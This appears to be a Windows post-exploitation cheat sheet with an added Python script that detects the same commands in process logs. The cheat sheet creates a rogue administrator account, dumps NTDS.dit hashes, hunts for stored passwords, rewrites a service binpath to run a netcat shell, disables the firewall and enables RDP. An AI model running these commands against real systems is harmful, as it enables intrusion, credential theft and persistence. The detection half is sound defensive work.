What to do once you have either a standard user or the SYSTEM user on Windows. This helps with privilege escalation if needed, but more so with gathering and enumerating as much information about the machine as possible!
--==Scripts==--
windows-privesc-check2.exe --audit -a -o report.txt
net user sp00ks sp00ks /add
net localgroup administrators sp00ks /add
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo - Check for hotfixes installed?
NTDS.dit dump using Crackmapexec
cme smb 192.168.1.1 -u USERNAME -p 'PASSWORD' -d 'DOMAIN' --ntds --exec-method smbexec
findstr /s /n /i /p /c:"password" *.txt
at
netsh firewall show state
schtasks /query /fo LIST /v
tasklist /SVC
DRIVERQUERY
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
accesschk.exe -ucqv Spooler
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -ucqv SSDPSRV
accesschk.exe -ucqv upnphost
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
type %WINDIR%\System32\drivers\etc\hosts
net user
net groups
net accounts /domain
cd C:\ & dir /S "proof.txt"
cd C:\ & dir /S "network-secret.txt"
netstat -pantob TCP
netstat -pantob UDP
start cmd.exe /k notepad.exe
Enable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Disable/Enable Firewall - Win XP/2003
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode mode=ENABLE
Check the firewall logs, if they exist
C:\WINDOWS\pfirewall.log
View all listening services
netstat -an |find /i "listening"
OS Name?
OS Version?
System Type?
Domain?
NICs?
Hotfixes?
Scheduled Tasks? (run 'at')
Password Policy? (net accounts /domain)
Hosts file output? (type %WINDIR%\System32\drivers\etc\hosts)
Firewall rules? (netsh advfirewall firewall)
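Every command in this list leaves a process-creation record when command-line auditing is on, so the same list doubles as detection content. The following is an added example, not part of the original post: it flags the state-changing commands above on their own and the enumeration commands only when several distinct ones run for one user on one host inside a short window. The event tuple shape, rule labels, window and threshold are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

# (label, regex, kind): "change" alerts alone, "recon" only counts toward a burst.
RULES = [(label, re.compile(rx, re.I), kind) for label, rx, kind in [
    ("local account created",   r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", "change"),
    ("added to administrators", r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", "change"),
    ("service binpath changed", r"\bsc(\.exe)?\s+config\s+\S+\s+binpath=", "change"),
    ("firewall disabled",       r"\bnetsh\s+firewall\s+set\s+opmode\s+(mode=)?disable\b", "change"),
    ("RDP enabled",             r"\breg(\.exe)?\s+add\b.*fDenyTSConnections.*\s/d\s+0\b", "change"),
    ("system inventory",        r"\bsysteminfo\b", "recon"),
    ("patch inventory",         r"\bwmic\s+qfe\b", "recon"),
    ("service ACL check",       r"\baccesschk(\.exe)?\s+-\S*c", "recon"),
    ("AlwaysInstallElevated",   r"\breg(\.exe)?\s+query\b.*AlwaysInstallElevated", "recon"),
    ("password search",         r"\b(findstr|reg(\.exe)?\s+query)\b.*password", "recon"),
    ("task/process listing",    r"\b(schtasks\s+/query|tasklist\s+/svc)\b", "recon"),
]]

def detect(events, window=timedelta(minutes=5), burst=4):
    # events: time-sorted (datetime, host, user, command_line) tuples (assumed shape)
    alerts, recent = [], {}
    for ts, host, user, cmd in events:
        hit = next(((l, k) for l, rx, k in RULES if rx.search(cmd)), None)
        if hit is None:
            continue
        label, kind = hit
        if kind == "change":
            alerts.append((ts, host, user, label))
            continue
        seen = recent.setdefault((host, user), [])
        seen.append((ts, label))
        seen[:] = [(t, l) for t, l in seen if ts - t <= window]  # drop stale hits
        distinct = sorted({l for _, l in seen})
        if len(distinct) >= burst:
            alerts.append((ts, host, user, "recon burst: " + ", ".join(distinct)))
            seen.clear()  # avoid re-alerting on the same burst
    return alerts

T0 = datetime(2024, 1, 1, 10, 0, 0)  # constructed sample events, not real logs
SAMPLE = [
    (T0, "WS01", "alice", 'systeminfo | findstr /B /C:"OS Name" /C:"OS Version"'),
    (T0 + timedelta(seconds=20), "WS01", "alice", "wmic qfe get Caption,Description,HotFixID,InstalledOn"),
    (T0 + timedelta(seconds=40), "WS01", "alice", "schtasks /query /fo LIST /v"),
    (T0 + timedelta(seconds=55), "WS01", "alice", "accesschk.exe -ucqv upnphost"),
    (T0 + timedelta(minutes=2), "WS01", "alice", "net user sp00ks sp00ks /add"),
    (T0 + timedelta(minutes=3), "WS02", "helpdesk", "systeminfo"),
    (T0 + timedelta(hours=2), "WS02", "helpdesk", "tasklist /SVC"),
]
```

Calling detect(SAMPLE) yields two alerts for WS01 (the burst and the account creation) and none for the two isolated admin commands on WS02.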